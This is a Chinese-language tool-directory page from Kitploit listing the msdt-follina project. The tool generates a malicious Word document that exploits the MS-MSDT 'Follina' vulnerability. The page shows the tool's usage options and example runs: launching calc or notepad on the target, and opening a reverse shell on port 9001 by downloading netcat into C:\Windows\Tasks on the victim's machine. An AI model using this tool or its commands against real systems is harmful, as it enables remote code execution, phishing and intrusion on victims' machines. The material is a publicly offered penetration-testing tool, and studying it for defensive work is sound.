Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
msdt-follina — 生成一个恶意 Microsoft Word 文档,利用 MS-MSDT “Follina” 漏洞执行任意命令或通过 HTTP 服务器暂存载荷。 | Kitploit
工具/GitHubGitHub/johnhammond/msdt-follina
漏洞利用Web应用程序漏洞利用钓鱼攻击命令与控制Payload 开发
GitHubjohnhammond/msdt-follina

msdt-follina

生成一个恶意 Microsoft Word 文档,利用 MS-MSDT “Follina” 漏洞执行任意命令或通过 HTTP 服务器暂存载荷。

查看仓库
1.6k370104年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MS-MSDT "Follina" 攻击向量

John Hammond | 2022年5月30日


使用恶意 Microsoft Word 文档创建 "Follina" MS-MSDT 攻击,并通过 HTTP 服务器托管载荷。

Screenshot

使用方法

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

示例

弹出 calc.exe:

root@kitploit:~
$ python3 follina.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

弹出 notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"

在端口 9001 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者机器上,并将其放置在 C:\Windows\Tasks 中。它不会清理该二进制文件。除非禁用防病毒软件,否则这将触发防病毒检测。

root@kitploit:~
$ python3 follina.py -r 9001

Reverse Shell

下载工具